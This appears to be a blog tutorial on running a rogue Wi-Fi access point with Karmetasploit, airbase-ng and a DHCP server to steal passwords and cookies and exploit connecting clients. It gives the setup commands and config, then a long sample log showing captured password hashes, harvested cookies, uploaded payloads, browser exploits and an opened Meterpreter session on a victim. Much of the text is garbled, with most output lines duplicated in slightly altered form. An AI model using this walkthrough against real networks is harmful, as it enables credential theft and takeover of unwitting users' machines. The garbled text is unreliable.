Karmetasploit used to create fake access points, capture passwords, compile information, and bring those attacks contralateral to browser clients. Karmetasploit is an additional step support tool for metasploit.
Features of Karmetasploit:
- Capture POP3 and IMAP4 passwords (clear-text and SSL)
- Accept outbound email sent over SMTP
- Parse out FTP and HTTP login information
- Steal cookies from large lists of popular web sites
- Steal saved form fields from the same web sites
- Use SMB relay attacks to load the Meterpreter payload
- Automatically exploit a wide range of browser flaws
Test setup prerequisites:
1. Linux laptop or machine
2. Metasploit framework with Karmetasploit
2. aircrack-ng
3. SQLite3
4. DHCP server
Now lets start with basics:
1. Install Metasploit framework with Karmetasploit:
$ svn co http://metasploit.com/svn/framework3/trunk msf3 or click here to download Metasploit 3.3
If you already have installed metasploit, click here to download Karmetasploit only.
2. Installing aircrack-ng
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng $ make # make install
Start it:
airmon-ng start wlanO
Possible Output:
Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill some of them!PID PID Name Name 878 878 avahi-daemon avahi-daemon 879 879 avahi-daemon avahi-daemon 1012 1012 NetworkManager NetworkManager 1041 1041 wpa_supplicant wpa_supplicant Interface Interface Chipset Chipset Driver Drivereth1 eth1 Unknown Unknown wl wl
wlan0 wlan0 Ralink 2573 USB Ralink 2573 USB rt73usb - [phy0] rt73usb - [phy0] (monitor mode enabled on mon0) (monitor mode enabled on mon0)
4. Installing SQLite3
# gem install activerecord sqlite3-ruby
5. Start DHCP server
vi /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60; default-lease-time 60;
max-lease-time 72; max-lease-time 72;
ddns-update-style none; ddns-update-style none;
authoritative; authoritative;
log-facility local7; log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 { subnet 10.0.0.0 netmask 255.255.255.0 (
range 10.0.0.100 10.0.0.254; range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1; option routers 10.0.0.1;
option domain-name-servers 10.0.0.1; option domain-name-servers 10.0.0.1;
} )Now lets setup! As aircrack-ng creates a virtual device in monitor mode, in this case mon0, on which we will lift the AP.
# airbase-ng-P-C 30-e "WIFI_POINT2"-v mon0 23:39:19 Created tap interface at0 Created 23:39:19 tap interface at0 23:39:19 Trying to set MTU on at0 to 1500 23:39:19 Trying to set MTU on at0 to 1500 23:39:19 Trying to set MTU on mon0 to 1800 23:39:19 Trying to set MTU on mon0 to 1800 23:39:19 Access Point with BSSID 00:24:01:12:3E:A6 started. 23:39:19 Access Point with BSSID 00:24:01:12:3 E: A6 started.
Now assign an IP and start the DHCP server , so we opened another shell, leaving the airbase-ng to work on.
# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 # dhcpd3-cf / etc/dhcp3/dhcpd.conf at0 Internet Systems Consortium DHCP Server V3.1.2 Copyright 2004-2008 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ For info, please visit http://www.isc.org/sw/dhcp/ Wrote 1 leases to leases file. Wrote 1 leases to leases file. Listening on LPF/at0/00:24:01:12:3e:a6/10.0.0/24 Listening on LPF/at0/00: 24:01:12:3 e: a6/10.0.0/24 Sending on LPF/at0/00:24:01:12:3e:a6/10.0.0/24 Sending on LPF/at0/00: 24:01:12:3 e: a6/10.0.0/24 Sending on Socket/fallback/fallback-net Sending on Socket / fallback / fallback-net Can't create PID file /var/run/dhcpd.pid: Permission denied. Can not create PID file / var / run / dhcpd.pid: Permission denied. ( - it is ok will still work , known error).
Now lets use Karmetasploit!
msfconsole-r karma.rc [*] Started reverse handler on port 3333 [*] Starting the payload handler... [*] Starting the payload handler ... [*] Started reverse handler on port 6666 [*] Started reverse handler on port 6666 [*] --- Done, found 14 exploit modules [*] --- Done, Found 14 exploit modules [*] Using URL: http://0.0.0.0:55550/ads [*] Using URL: http://0.0.0.0:55550/ads [*] Local IP: http://77.209.92.221:55550/ads [*] Local IP: http://77.209.92.221:55550/ads [*] Server started. [*] Server started.
msf auxiliary(http) > msf auxiliary (http)>
Note:- if you have manually downloaded then run
msfconsole-r /tmp/karma.rc (/tmp is the path of file karma.rc)
Sample output:
[*] Received 10.0.0.100:1362 TARGET P0WN3D LMHash: 47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH: ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS: Windows 2000 2195 LM: Windows 2000 5.0 [*] Authenticating to 10.0.0.100 as TARGETP0WN3D... [*] Authenticating to 10.0.0.100 as TARGET P0WN3D ... [*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.myspace.com:80 GET / Windows IE 5.01 forms.html cookies = [*] AUTHENTICATED as TARGETP0WN3D... [*] Authenticated as TARGETP0WN3D ... [*] Connecting to the ADMIN$ share... [*] Connecting to the ADMIN $ share ... [*] HTTP REQUEST 10.0.0.100 > www.sample.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.plaxo.com:80 GET / Windows IE 5.01 forms.html cookies = [*] Regenerating the payload... [*] Regenerating the payload ... [*] Uploading payload... [*] Uploading payload ... [*] HTTP REQUEST 10.0.0.100 > www.example.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.ryze.com:80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > www.someforum.org:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.slashdot.org:80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > www.socialenggsite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.twitter.com:80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > www.bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.xing.com:80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > www.mailsite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.yahoo.com:80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> xing.com: 80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > mailsite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> yahoo.com: 80 GET / Windows IE 5.01 forms.html cookies = [*] Created UxsjordQ.exe... [*] Created UxsjordQ.exe ... [*] HTTP REQUEST 10.0.0.100 > bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> ziggs.com: 80 GET / Windows IE 5.01 forms.html cookies = [*] Connecting to the Service Control Manager... [*] Connecting to the Service Control Manager ... [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> care.com: 80 GET / Windows IE 5.01 cookies = [*] HTTP REQUEST 10.0.0.100 > www.someinfogather.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.gather.com:80 GET / Windows IE 5.01 forms.html cookies = [*] HTTP REQUEST 10.0.0.100 > www.bookmarksite.com:80 GET /forms.html Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.bookmarksite.com:80 GET / Windows IE 5.01 forms.html cookies = [*] Obtaining a service manager handle... [*] Creating a new service... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Removing the service... [*] Closing service handle... [*] Deleting UxsjordQ.exe... [*] Sending Access Denied to 10.0.0.100:1362 TARGETP0WN3D [*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0 [*] Sending Access Denied to 10.0.0.100:1362 [*] Received 10.0.0.100:1365 TARGETP0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0 [*] Received 10.0.0.100:1365 TARGET P0WN3D LMHash: 3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH: ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS: Windows 2000 2195 LM: Windows 2000 5.0 [*] Authenticating to 10.0.0.100 as TARGETP0WN3D... [*] AUTHENTICATED as TARGETP0WN3D... [*] Ignoring request from 10.0.0.100, attack already in progress. [*] Sending Access Denied to 10.0.0.100:1365 TARGETP0WN3D [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278... [*] Sending stage (2650 bytes) [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367... [*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.somecare2.com:80 GET / Windows IE 5.01 cookies = [*] Sleeping before handling stage... [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> www.somemail.com:80 GET / Windows IE 5.01 cookies = [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies= [*] HTTP REQUEST 10.0.0.100> somemail.com: 80 GET / Windows IE 5.01 cookies = [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Migrating to lsass.exe... [*] Current server process: rundll32.exe (848) [*] New server process: lsass.exe (232) [*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)
msf auxiliary(http) > sessions -l msf auxiliary (http)> sessions-l Active sessions Active sessions =============== =============== Id Description Tunnel Id Description Tunnel -- ----------- ------ - ----------- ------ 1 Meterpreter 10.0.0.1:45017 -> 10.0.0.100:1364 1 Meterpreter 10.0.0.1:45017 -> 10.0.0.100:1364
Mission accomplished! Our work is done!
Searches leading to this post:karmetasploit, airbase-ng tutorial, 10 0 0 100, airbase-ng gui, avahi-daemon open(/var/run/avahi-daemon//pid): Permission denied, karmetasploit dhcpd, karmetasploit download, make wireless sniffer, ruby gem sniffe
You must log in to post a comment.